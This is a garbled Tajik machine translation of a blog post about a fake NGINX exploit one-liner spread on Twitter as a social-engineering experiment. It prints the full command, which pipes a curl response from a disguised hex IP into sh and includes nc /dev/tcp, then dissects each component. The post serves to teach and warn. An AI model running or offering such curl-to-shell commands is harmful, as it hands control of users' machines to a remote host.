Шарҳ. тарҷума.:
TL; DR: Дар ҳеҷ ваҷҳ лӯлаи файлро дар sh ё bash истифода набаред. Ин як роҳи олии аз даст додани назорати компютери шумост.
Ман мехоҳам бо шумо як ҳикояи кӯтоҳеро дар бораи истисмори комиксҳои PoC, ки 31 май сохта шудааст, мубодила кунам. Вай фавран дар посух ба хабарҳои аз
Пас аз анҷом додани кор дар як техникаи нави печида дар curl, ман аз твитҳои аслӣ иқтибос овардам ва "як PoC-и корӣ"-ро, ки аз як сатри код иборат аст, гӯё осебпазирии кашфшударо истифода мебарад, ифшо кардам. Албатта, ин гапи тамоман бемаънӣ буд. Ман гумон мекардам, ки ман фавран фош мешавам ва дар беҳтарин ҳолат ман якчанд ретвит мегирам (оё хуб).
Бо вуҷуди ин, ман тасаввур карда наметавонистам, ки баъд чӣ шуд. Маъруфияти твитҳои ман хеле баланд шуд. Тааҷҷубовар аст, ки дар айни замон (15:00 ба вақти Маскав 1 июн) чанд нафар дарк кардаанд, ки ин қалбакӣ аст. Бисёр одамон онро бе тафтиши он retweet мекунанд (бигзор ба ҳайрат овардани графикаи зебои ASCII, ки аз он мебарорад).
Танҳо бубинед, ки чӣ қадар зебост!
Гарчанде ки ҳамаи ин ҳалқаҳо ва рангҳо бузурганд, маълум аст, ки одамон бояд барои дидани онҳо кодро дар мошини худ иҷро кунанд. Хушбахтона, браузерҳо ҳамин тавр кор мекунанд ва дар якҷоягӣ бо он, ки ман аслан намехостам ба мушкилоти ҳуқуқӣ дучор шавам, коди дар сайти ман дафншуда бе кӯшиши насб кардан ё иҷро кардани ягон рамзи иловагӣ танҳо зангҳои эхо мекард.
Мушкилоти хурд:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Муҳандисии иҷтимоӣ-электронӣ (SEE) - на танҳо фишинг
Бехатарӣ ва ошноӣ қисми асосии ин озмоиш буданд. Ман фикр мекунам, ки онҳо ба муваффақияти ӯ оварда расониданд. Сатри фармон ба таври возеҳ амниятро бо истинод ба "127.0.0.1" (хости маъруфи маҳаллӣ) дар назар дошт. Localhost бехатар ҳисобида мешавад ва маълумот дар он ҳеҷ гоҳ компютери шуморо тарк намекунад.
Шиносӣ ҷузъи дуюми калидии SEE дар таҷриба буд. Азбаски аудиторияи мақсаднок асосан аз одамоне иборат буд, ки бо асосҳои амнияти компютерӣ ошно буданд, эҷод кардани код муҳим буд, то ки қисмҳои он шинос ва шинос (ва аз ин рӯ бехатар) ба назар расад. Гирифтани унсурҳои консепсияҳои кӯҳнаи истисмор ва ба таври ғайриоддӣ муттаҳид кардани онҳо хеле муваффақ буд.
Дар зер таҳлили муфассали як-лайнер аст. Ҳама чиз дар ин рӯйхат пӯшида мешавад табиати косметикӣ, ва барои кори хакикии он амалан чизе талаб карда намешавад.
Кадом ҷузъҳо воқеан заруранд? Ин -gsS
, -O 0x0238f06a
, |sh
ва худи сервери веб. Веб-сервер ягон дастури зараровар надошт, балки танҳо бо истифода аз фармонҳо ба графикаи ASCII хизмат мекард echo
дар скрипт, ки дар index.html
. Вақте ки корбар як сатри бо |sh
дар байн, index.html
бор карда, ичро карда шудааст. Хушбахтона, нигаҳбонони веб-сервер ягон нияти бад надоштанд.
-
../../../%00
— аз доираи директория берун рафтанро ифода мекунад; -
ngx_stream_module.so
— роҳ ба модули тасодуфии NGINX; -
/bin/sh%00<'protocol:TCP'
— гуё мо ба кор андохта истодаем/bin/sh
дар мошини мавриди ҳадаф ва масири баромадро ба канали TCP; -
-O 0x0238f06a#PLToffset
- компоненти махфӣ, иловашуда#PLToffset
, ба назар мисли ҷуброн хотираи гӯё дар PLT мавҷуд аст; -
|sh;
- боз як порчаи муҳим. Ба мо лозим буд, ки баромадро ба sh/bash равона кунем, то коди аз веб-сервери ҳамлакунанда воқеъ дар он ҷойгиршуда иҷро шавад.0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- dummy, ки дар он netcat ишора мекунад/dev/tcp/localhost
то ки ҳама чиз боз бехатар ба назар расад. Дар асл, он ҳеҷ кор намекунад ва ба хати зебоӣ дохил карда шудааст.
Бо ин рамзкушоии скрипти яксатрӣ ва муҳокимаи ҷанбаҳои "муҳандисии иҷтимоӣ-электронӣ" (фишингҳои мураккаб) анҷом меёбад.
Конфигуратсияи сервери веб ва чораҳо
Азбаски аксарияти муштариёни ман infosec/хакерҳо ҳастанд, ман тасмим гирифтам, ки веб-серверро ба ифодаҳои "манфиат"-и онҳо каме тобовартар кунам, то бачаҳо коре дошта бошанд (ва ин шавқовар хоҳад буд ташкил кардан). Ман дар ин ҷо ҳама хатогиҳоро номбар намекунам, зеро таҷриба то ҳол идома дорад, аммо инҳоянд чанд коре, ки сервер мекунад:
- Кӯшишҳои паҳнкуниро дар баъзе шабакаҳои иҷтимоӣ фаъолона назорат мекунад ва эскизҳои гуногуни пешнамоишро иваз мекунад, то корбарро барои клик кардани истинод ҳавасманд кунад.
- Ба ҷои нишон додани скрипти ҷилди Chrome/Mozilla/Safari/etc ба видеои таблиғотии Thugcrowd масир мегардонад.
- Аломатҳои возеҳ аз ҳамла/хакерии ошкоро тамошо карда, сипас ба масир равона кардани дархостҳо ба серверҳои NSA оғоз мекунад (га!).
- Троян ва инчунин rootkit BIOS-ро дар ҳама компютерҳое, ки корбаронашон аз браузери муқаррарӣ ба ҳост ташриф меоранд, насб мекунад (шӯхӣ!).
Як қисми ками антимерҳо
Дар ин ҳолат, ҳадафи ягонаи ман азхуд кардани баъзе хусусиятҳои Apache буд, аз ҷумла, қоидаҳои ҷолиби масир барои дархостҳо - ва ман фикр кардам: чаро не?
NGINX Exploit (воқеӣ!)
Обуна ба
Манбаъ: will.com